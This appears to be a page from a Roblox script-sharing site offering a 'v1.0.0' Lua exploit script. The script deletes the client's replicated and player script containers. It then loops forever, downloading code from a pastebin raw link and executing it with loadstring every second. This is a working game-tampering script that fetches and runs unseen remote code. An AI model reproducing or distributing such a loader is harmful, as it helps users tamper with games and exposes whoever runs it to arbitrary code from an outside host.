Version / Update: v1.0.0
- Download / Script Link
- local servicesToDelete = {
game:GetService("ReplicatedStorage"),
game:GetService("ReplicatedFirst"),
game:GetService("StarterPlayer").StarterPlayerScripts,
game:GetService("StarterPlayer").StarterCharacterScripts,
game:GetService("Players").LocalPlayer.PlayerScripts
}
for _, service in ipairs(servicesToDelete) do
if service then
for _, child in ipairs(service:GetChildren()) do
child:Destroy()
end
end
end
task.wait(3)
while true do
pcall(function()
loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))()
end)
task.wait(1)
end[ View More ]
[